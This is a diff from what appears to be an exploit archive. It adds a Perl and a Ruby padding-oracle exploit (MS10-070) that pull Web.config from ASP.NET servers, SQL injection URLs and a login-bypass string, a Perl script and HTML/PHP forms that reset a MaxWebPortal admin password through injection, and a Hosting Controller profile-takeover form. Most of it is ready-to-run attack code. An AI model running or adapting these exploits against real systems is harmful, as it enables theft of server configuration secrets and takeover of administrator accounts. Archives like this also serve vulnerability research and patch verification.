<tns:Test>
<someList href="#id1" />
</tns:Test>
<tns:ArrayOfInt>
<Item>0</Item>
</tns:ArrayOfint>
</soap:Body>
</soap:Envelope>

138
platforms/asp/remote/15213.pl Executable file
View file

@ -0,0 +1,138 @@
# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
#!/usr/bin/perl
#
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# FOr use this script you need Pudbuster.
# Padbuster is a great tool and Brian Holyfield deserve all the credits.
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
# A similar exploitation vector was also added lately in Padbuster v0.3:
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
# http://www.exploit-db.com/sploits/padBuster.pl
#
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl;
my $testBytes;
my $sampleBytes;
my $testUrl = @ARGV[0]."\?d\=";
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];
if ($#ARGV < 2) {
die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to use.
This need to come from Padbuster.
BlockSize = The block size being used by the algorithm (8 or 16)
Poc code by giorgio.fedon\@mindedsecurity.com
Original Padbuster code from Brian Holyfield - Gotham Digital Science
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
";}
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
while ($status)
{
# Fuzz the test bytes
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
{
substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
}
# Combine the test bytes and the sample
my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
chomp($combinedTestBytes);
$combinedTestBytes =~ s/\%0A//g;
# Ok, now make the request
my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
if ($status == "200")
{
# Remove this for "T" exploit
if (index($content,"parent\.Sys\.Application") == -1)
{
print $content."\n\n";
print "Total Requests:".$counter."\n\n";
print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
last;
}
}
$counter++;
}
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
my ($toEncodeDecode, $oper) = @_;
# UrlDecoder Encoder
if ($oper == 1)
{
$toEncodeDecode =~ s/\-/\+/g;
$toEncodeDecode =~ s/\_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
}
else
{
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/\-/g;
$b64Encoded =~ s/\//\_/g;
my $count = $b64Encoded =~ s/\=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
}
return $returnVal;
}
sub makeRequest {
my ($method, $url) = @_;
my ($lwp, $status, $content, $req, $location, $contentLength);
# Setup LWP UserAgent
$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],
);
$req = new HTTP::Request $method => $url;
my $response = $lwp->request($req);
# Extract the required attributes from the response
$status = substr($response->status_line, 0, 3);
$content = $response->content;
#print $content;
$location = $response->header("Location");
if ($location eq "")
{
$location = "N/A";
}
$contentLength = $response->header("Content-Length");
return ($status, $content, $location, $contentLength);
}

642
platforms/asp/remote/15265.rb Executable file
View file

@ -0,0 +1,642 @@
#!/usr/bin/ruby -w
#
# aspx_po_chotext_attack.rb
#
# Copyright (c) 2010 AmpliaSECURITY. All rights reserved
#
# http://www.ampliasecurity.com
# Agustin Azubel - aazubel@ampliasecurity.com
#
#
# MS10-070 ASPX proof of concept
# Decrypt data using Vaudenay's cbc-padding-oracle-side-channel
# Encrypt data using Rizzo-Duong CBC-R technique
#
# Copyright (c) 2010 Amplia Security. All rights reserved.
#
# Unless you have express writen permission from the Copyright
# Holder, any use of or distribution of this software or portions of it,
# including, but not limited to, reimplementations, modifications and derived
# work of it, in either source code or any other form, as well as any other
# software using or referencing it in any way, may NOT be sold for commercial
# gain, must be covered by this very same license, and must retain this
# copyright notice and this license.
# Neither the name of the Copyright Holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
$debugging = false
require 'net/http'
require 'uri'
require 'rexml/document'
#<require 'xarray'>
module XArray
def hex_inspect
"[#{length}][ #{map { |x| x.hex_inspect }.join ", " } ]"
end
end
class Array
include XArray
end
#</require 'xarray'>
#<require 'xbase64'>
require 'base64'
class XBase64
def self.encode s
s = Base64.encode64 s
s = s.gsub '+', '-'
s = s.gsub '/', '_'
s = s.gsub "\n", ''
s = s.gsub "\r", ''
s = XBase64.encode_base64_padding s
end
def self.encode_base64_padding s
padding_length = 0
padding_length += 1 while s[-1 - padding_length, 1] == "="
s[0..(-1 - padding_length)] + padding_length.to_s
end
def self.decode s
s = s.gsub '-', '+'
s = s.gsub '_', '/'
s = self.decode_base64_padding s
Base64.decode64 s
end
def self.decode_base64_padding s
padding_length = s[-1,1].to_i
s[0...-1] + ("=" * padding_length)
end
end
#</require 'xbase64'>
#<require 'xstring'>
module XString
def xor other
raise RuntimeError, "length mismatch" if self.length != other.length
(0...length).map { |i| self[i] ^ other[i] }.map { |x| x.chr }.join
end
alias ^ :xor
def hex_inspect
printables = [ "\a", "\b", "\e", "\f", "\n", "\r", "\t", "\v" ] + \
(0x20..0x7e).entries
"[#{length}]" + "\"#{unpack("C*").map { |x|
printables.include?(x) ? x.chr : "\\x%02x" % x }.join}\""
end
def to_blocks blocksize
(0...length/blocksize).map { |i| self[blocksize * i, blocksize]}
end
end
class String
include XString
end
#</require 'xstring'>
#<require 'padding_verification_strategy'>
class PaddingVerificationStrategy
def initialize parameters
@parameters = parameters
end
def valid_padding?
raise RuntimeError, "abstract method !"
end
end
class ErrorCodeStrategy < PaddingVerificationStrategy
def valid_padding? response
invalid_padding_error_code = @parameters[:invalid_padding_error_code]
not (invalid_padding_error_code == response.code)
end
end
class BodyLengthStrategy < PaddingVerificationStrategy
def valid_padding? response
invalid_padding_body_length = @parameters[:invalid_padding_body_length]
absolute_error = @parameters[:absolute_error]
not ( (invalid_padding_body_length - response.body.length).abs < absolute_error)
end
end
class BodyContentStrategy < PaddingVerificationStrategy
def valid_padding?
end
end
class TimingStrategy < PaddingVerificationStrategy
def valid_padding?
end
end
#</require 'padding_verification_strategy'>
#<require 'padding_oracle_decryptor'>
class PaddingOracleDecryptor
attr_accessor :blocksize
attr_accessor :d_value
attr_accessor :http
attr_accessor :strategy
def initialize
@tries = 0
@a = []
@decrypted = []
@blocksize = nil
@d_value = nil
@http = nil
@strategy = nil
end
def discover_blocksize_and_oracle_behaviour
puts "discovering blocksize and oracle behaviour..."
[ 16, 8 ].each do |b|
ciphertext = @d_value.clone
ciphertext[-(b * 3)] ^= 0x01
response = http.send_request ciphertext
valid_padding_code = response.code
valid_padding_body_length = response.body.length
0.upto b - 1 do |i|
ciphertext = @d_value.clone
ciphertext[-(b * 2) + i] ^= 0x01
response = http.send_request ciphertext
# puts "code: #{response.code}, length: #{response.body.length}"
# if valid_padding_code != response.code
# puts "padding verification strategy based on error code"
# @strategy = ErrorCodeStrategy.new :valid_padding_code => valid_padding_code,
# :invalid_padding_code => response.code
# @blocksize = b
# break
# end
if valid_padding_body_length != response.body.length
absolute_error = 200
if (valid_padding_body_length - response.body.length).abs > absolute_error
puts "padding verification strategy based on body length"
@strategy = BodyLengthStrategy.new :valid_padding_body_length => valid_padding_body_length,
:invalid_padding_body_length => response.body.length,
:absolute_error => absolute_error
@blocksize = b
break
end
end
end
break if blocksize
end
raise RuntimeError, "could not select a valid padding verification strategy!" unless blocksize
puts "discovered blocksize: #{blocksize}"
# blocksize and padding_length leads to automatic tail decryption !
blocksize
end
def valid_padding? response
strategy.valid_padding? response
end
def ask_oracle r
@tries += 1
r = r[1..-1].pack "C" * blocksize
ciphertext = d_value + r + @y
response = http.send_request ciphertext
return 1 if valid_padding? response
return 0
end
def decrypt_last_word
print "last word... "
$stdout.flush
b = blocksize
# 1. pick a few random words r[1],...,r[b] and take i = 0
saved_r = [0]
saved_r += (1..b).map { |i| rand 0xff }
i = 1
loop do
r = saved_r.clone
# 2. pick r = r[1],...,r[b-1],(r[b] xor i)
r[b] = r[b] ^ i
# 3. if O(r|y) = 0 then increment i and go back to the previous step
break if ask_oracle(r) == 1
i += 1
raise "failed!" if i > 0xff
end
# 4. replace r[b] by r[b xor i]
saved_r[b] = saved_r[b] ^ i
# 5. for n = b down to 2 do
# (a) take r = r[1],...,r[b-n],(r[b-n+1] xor 1),r[b-n+2],...,r[b]
# (b) if O(r|y) = 0 then stop and output (r[b-n+1] xor n),...,r[b xor n]
b.downto 2 do |n|
r = saved_r.clone
r[b-n+1] = r[b-n+1] ^ 1
if ask_oracle(r) == 0
# puts "lucky #{n}!"
n.downto(1) do |t|
word = r[b-t+1] ^ n
@a[b-t+1] = word
puts "a[#{b-t+1}]: #{word}"
end
return
end
end
r = saved_r.clone
# 6. output r[b] xor 1
last_word = r[b] ^ 1
@a[blocksize] = last_word
# puts "\x07a[#{blocksize}]: 0x%02x" % @a[blocksize]
end
def decrypt_ax x
print "a[#{x}]... "
$stdout.flush
b = blocksize
j = x+1
saved_r = [ 0 ]
# 2. pick r[1],...,r[j-1] at random and take i = 0
saved_r += (1..x).map { |i| rand 0xff }
i = 0
# 1. take r[k] = a[k] xor ( b - j + 2) for k = j,...,b
2.upto b do |k|
saved_r[k] = @a[k] ^ (b - j + 2) if x < k
end
loop do
r = saved_r.clone
# 3. take r = r[1]...r[j-2](r[j-1] xor i)r[j]..r[b]
r[x] = r[x] ^ i
# 4. if O(r|y) = 0 then increment i and go back to the previous step
break if (ask_oracle r) == 1
i += 1
raise "failed!" if i > 255
end
r = saved_r.clone
# 5. output r[j-1] xor i xor (b - j + 2)
@a[x] = (r[x] ^ i) ^ (b - j + 2)
# puts "\x07a[#{x}]: 0x%02x" % @a[x]
end
def decrypt_block iv, y
@tries = 0
@iv = iv
@y = y
print "decrypting "
$stdout.flush
decrypt_last_word
(blocksize - 1).downto 1 do |j|
decrypt_ax j
end
puts
puts "tries: #{@tries}, average: #{(blocksize * 256) / 2}"
@a.shift
plaintext_block = (0...blocksize).map { |i| @a[i] ^ @iv[i] }.pack "C*"
plaintext_block
end
def decrypt ciphertext
plaintext_blocks = Array.new
cipher_blocks = ciphertext.to_blocks blocksize
iv = "\x00" * blocksize
cipher_blocks.unshift iv
1.upto cipher_blocks.length - 2 do |i|
plaintext_block = decrypt_block cipher_blocks[-i - 1], cipher_blocks[-i]
plaintext_blocks.unshift plaintext_block
end
plaintext_blocks.join
end
end
#</require 'padding_oracle_decryptor'>
class ASPXPaddingOracleChosenCiphertextAttack
attr_reader :uri
attr_reader :filename
attr_reader :filelength
attr_reader :filere
attr_reader :http
attr_reader :d_value
attr_reader :blocksize
attr_reader :axdpath
attr_reader :axdname
attr_reader :decryptor
attr_reader :base_mask
def initialize parameters
@uri = URI.parse parameters[:uri]
@filename = parameters[:filename]
@filelength = parameters[:filelength]
@filere = parameters[:filere]
@http = http_initialize
@d_value = nil
@base_mask = rand 0xffff
@blocksize = nil
@axdpath = nil
@axdname = nil
@decryptor = PaddingOracleDecryptor.new
puts "using target: #{@uri}"
puts "using base_mask: 0x%04x" % @base_mask
end
def http_initialize
http = Net::HTTP.new @uri.host, @uri.port
http
end
def parse_script_tag xml, re
d = nil
doc = REXML::Document.new xml
doc.elements.each 'script' do |e|
src_attribute = e.attributes['src']
md = re.match src_attribute
d = md[1]
break
end
raise RuntimeError, "could not parse script_tag" unless d
d
end
private :parse_script_tag
def get_ciphertext_sample
puts "starting connection..."
http.start
[ [ "ScriptResource.axd", /\/ScriptResource\.axd\?d=([a-zA-Z0-9\-\_]+)\&t=[a-z0-9]+/ ]
].each do |name, re|
headers = { 'User-Agent' => \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' }
response = http.get uri.path, headers
body = response.body
script_tags = body.lines.select { |x| x.index name }
next if script_tags.empty?
# puts "script tags using #{name} [#{script_tags.length}]:"
# puts script_tags.map { |x| "\t#{x}" }
d = parse_script_tag script_tags[0], re
puts "using script: #{name}"
puts "using d_value: #{d}"
@axdpath = uri.path[0, uri.path.rindex('/')]
@axdname = name
@d_value = ("\x00" * 16) + (XBase64.decode d)
break
end
raise RuntimeError, "could not find any axd sample" unless d_value
decryptor.http = self
decryptor.d_value = d_value
d_value
end
def parse_html_body h, body
parsed = String.new
doc = REXML::Document.new body
doc.elements.each h do |e|
parsed = e.text
break
end
parsed
end
def send_request d
request = Net::HTTP::Get.new "/#{axdpath}/#{axdname}?d=#{XBase64.encode d}"
request['Connection'] = 'Keep-Alive'
@http.request request
end
def decrypt ciphertext
decryptor.decrypt ciphertext
end
def discover_blocksize_and_oracle_behaviour
@blocksize = decryptor.discover_blocksize_and_oracle_behaviour
end
def reallocate_cipher_blocks cipher_blocks, new_plaintext_blocks
puts "cipher_blocks.count: #{cipher_blocks.count}"
required_block_count = 1 + new_plaintext_blocks.length + 1
puts "required_block_count: #{required_block_count}"
if required_block_count < cipher_blocks.count then
delta = cipher_blocks.count - required_block_count
puts "removing #{delta} extra blocks..."
cipher_blocks = [ cipher_blocks[0] ] + cipher_blocks[-required_block_count+1..-1]
elsif required_block_count > cipher_blocks.count then
delta = required_block_count - cipher_blocks.count
puts "adding #{delta} extra_blocks..."
cipher_blocks = [ cipher_blocks[0], ("\x00" * blocksize) * delta ] + cipher_blocks[1..-1]
end
puts "cipher_blocks.count: #{cipher_blocks.count}"
cipher_blocks
end
private :reallocate_cipher_blocks
def generate_new_plaintext_blocks
tail_padding = "\x01"
head_padding_length = blocksize - ( (@filename.length + tail_padding.length) % blocksize)
head_padding_length = 0 if head_padding_length == blocksize
head_padding = "\x00" * head_padding_length
new_plaintext = head_padding + @filename + tail_padding
new_plaintext.to_blocks blocksize
end
private :generate_new_plaintext_blocks
def encrypt
puts "encrypting \"#{@filename.hex_inspect}..."
new_plaintext_blocks = generate_new_plaintext_blocks
cipher_blocks = @d_value.to_blocks blocksize
cipher_blocks = reallocate_cipher_blocks cipher_blocks, new_plaintext_blocks
puts "decrypting #{new_plaintext_blocks.length} blocks..."
(1..new_plaintext_blocks.length).each do |i|
puts "block #{i} of #{new_plaintext_blocks.length}"
old_plaintext_block = decryptor.decrypt_block cipher_blocks[-i - 1], cipher_blocks[-i]
puts "old_plaintext_block: #{old_plaintext_block.hex_inspect}"
cipher_blocks[-1 - i] ^= old_plaintext_block ^ new_plaintext_blocks[-i]
end
puts "eye candy: decrypting crafted ciphertext"
new_plaintext = decrypt cipher_blocks.join
puts "new_plaintext: #{new_plaintext.hex_inspect}"
@d_value = cipher_blocks.join
end
def discover_escape_sequence
puts "discovering escape sequence..."
escape_sequence_mask = nil
offset = base_mask % (blocksize - 4)
ciphertext = d_value.clone
0x1ffff.times do |mask|
ciphertext[offset, 4] = [ base_mask + mask ].pack "L"
response = send_request ciphertext
print "\rtrying escape_mask: 0x%05x/0x1ffff, http_code: %4d, body_length: %5d" % \
[ mask, response.code, response.body.length ]
next unless response.code == "200"
next if filelength and (response.body.length < filelength)
next if filere and (not filere =~ response.body)
escape_sequence_mask = base_mask + mask
puts
puts "found!"
puts "press any key to show the contents of the file"
$stdin.gets
puts response.body
break
end
raise RuntimeError, "no more combinations to try !" unless escape_sequence_mask
escape_sequence_mask
end
def pause
puts
puts "press any key to start the attack"
$stdin.gets
end
def run
get_ciphertext_sample
pause
discover_blocksize_and_oracle_behaviour
encrypt
discover_escape_sequence
end
end
puts [ "-------------------------------------------",
"aspx_po_chotext_attack.rb",
"(c) 2010 AmpliaSECURITY",
"http://www.ampliasecurity.com",
"Agustin Azubel - aazubel@ampliasecurity.com",
"-------------------------------------------",
"\n" ].join "\n"
if ARGV.length != 1 then
$stderr.puts "usage: ruby #{$PROGRAM_NAME} http://192.168.1.1/Default.aspx"
exit
end
begin
parameters = {
:uri => ARGV.first,
:filename => "|||~/Web.config",
:filere => /configuration/
}
x = ASPXPaddingOracleChosenCiphertextAttack.new parameters
x.run
rescue Exception => e
$stderr.puts "Exploit failed: #{e}"
raise if $debugging
end

7
platforms/asp/remote/27861.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/17964/info
WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
Successful exploits of these vulnerabilities could allow an attacker to access or modify data, steal cookie-based authentication credentials, perform username-enumeration, access sensitive information, and gain unauthorized access to script source code. Other attacks are also possible.
http://www.example.com:8022/NmConsole/Navigation.asp?">[code]

7
platforms/asp/remote/27862.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/17964/info
WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
Successful exploits of these vulnerabilities could allow an attacker to access or modify data, steal cookie-based authentication credentials, perform username-enumeration, access sensitive information, and gain unauthorized access to script source code. Other attacks are also possible.
http://www.example.com:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=2

8
platforms/asp/shellcode/25426.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/13183/info
OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/owProductDetail.asp?idProduct='SQL_INJECTION
http://www.example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab

12
platforms/asp/shellcode/25751.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/13804/info
os4e is prone to an SQL injection vulnerability.
This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
All versions are considered to be vulnerable at the moment.
The following proof of concept is available:
Password= ' or ''='

76
platforms/asp/webapps/1010.pl Executable file
View file

@ -0,0 +1,76 @@
#!/usr/bin/perl
#################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#################################################################
# EXPLOIT FOR - MAX Portal (All Versions)
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#
#Discovered by: s d <irsdl@yahoo.com>
#
#################################################################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
#And Iranian Hacking & Security Teams :
# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev
#################################################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: Max.pl <T4rg3t> <V3rsion>\n\n";
print " V3rsion :\n";
print " 1 ==> Version 1.35 and 0lder\n";
print " 2 ==> Version 1.36, 2.0 and Next\n";
print "==========================================\n\n";
print "Example:\n\n";
print " Max.pl www.Site.com 1\n";
exit();
}
$hell = "foo' or M_Name='admin";
if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272"};
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "POST /password.asp?mode=reset HTTP/1.0";
$http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
$http .= "Accept-Language: fa\n";
$http .= "Content-Type: application/x-www-form-urlencoded\n";
$http .= "Pragma: no-cache\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n";
$http .= "Content-Length: 111\n";
$http .= "Proxy-Connection: Keep-Alive\n";
$http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin\n\n";
$http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit\n\n\n\n";
print "\n";
print $remote $http;
sleep(1);
print "[+] Attacking ...\n";
print "[+] Changing Admin's Password ...\n";
while (<$remote>)
{
}
print "\nNow Go to $host and Login With :\n\n";
print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
### EOF ###
# milw0rm.com [2005-05-26]

35
platforms/asp/webapps/1011.php Executable file
View file

@ -0,0 +1,35 @@
<?php
/*
------Trap-Set Underground Hacking Team-----------------mh_p0rtal----------------------
Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams :
Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
, CrouZ Security Team , Simorgh-ev Security Team
----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
*/
# Config ________________________________
# address - example: http://www.site.com/password.asp
$url = "http://www.mohamad.com/password.asp";
$mh = "s1";
# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"
# if webmaxportal version is : Version 1.36 , 2.0 please input $mh= "s2"
# EnD ___________________________________
if ( $mh == "s1" ) {
print "<form action=\"$url?mode=reset\" method=\"post\"> <br> ";
print "Password1 : <input name=\"pass\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
print "Confirm Pass: <input name=\"pass2\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
print " ID :&nbsp&nbsp&nbsp <input name=\"memId\" type=\"text\" value=\"-1\" size=\"50\"><br>";
print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo' or M_Name='admin\" size=\"50\"><br>";
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
print "</form>";
} if ( $mh == "s2" ) {
print "<form action=\"$url?mode=reset\" method=\"post\"> <br> ";
print "Password1: <input name=\"pass\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
print "Confirm Pass : <input name=\"pass2\" type=\"text\" value=\"abc123\" size=\"50\"><br> ";
print "ID : &nbsp&nbsp&nbsp<input name=\"memId\" type=\"text\" value=\"-1\" size=\"50\"><br> ";
print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name='admi n' or ('1'='2\" size=\"50\"> <br>";
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
print "</form>";
}
?>
# milw0rm.com [2005-05-26]

38
platforms/asp/webapps/1012.txt Executable file
View file

@ -0,0 +1,38 @@
<!--
Hi, I'm Soroush Dalili from Grayhatz Security Group (GSG) . I found dangerous sql injection
in Maxwebportal version 1.35,1.36,2.0, 20050418 Next
Remote user can inject his/her code in "memKey" var. and change other users password in
password.asp
Exploit codes to proof:
-->
-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
Version 1.36, 2.0, 20050418 Next:
-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2"
size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
# milw0rm.com [2005-05-26]

37
platforms/asp/webapps/1015.txt Executable file
View file

@ -0,0 +1,37 @@
<!--
Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
Title: Hosting controller program have a security bug
in "UserProfile.asp" that an authenticated user can
change other's profiles.
Why is it dangerous: a user can change other's email
address and then use forgot password to recieve their
password! also he/she can gain administrator password
by this way!
Version: 6.1 HotFix 2.0 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to
manage a host.
Exploit code to proof:
--------------------------------
Change users profiles: -->
<form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post">
Username : <input name="UserList" value="hcadmin" type="text" size="50">
<br>
emailaddress : <input name="emailaddress" value="Crkchat@msn.com" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat" type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>
<!--
-----------------------------------
Now u can use forgot password to gain passwords! -->
# milw0rm.com [2005-05-27]

Some files were not shown because too many files have changed in this diff Show more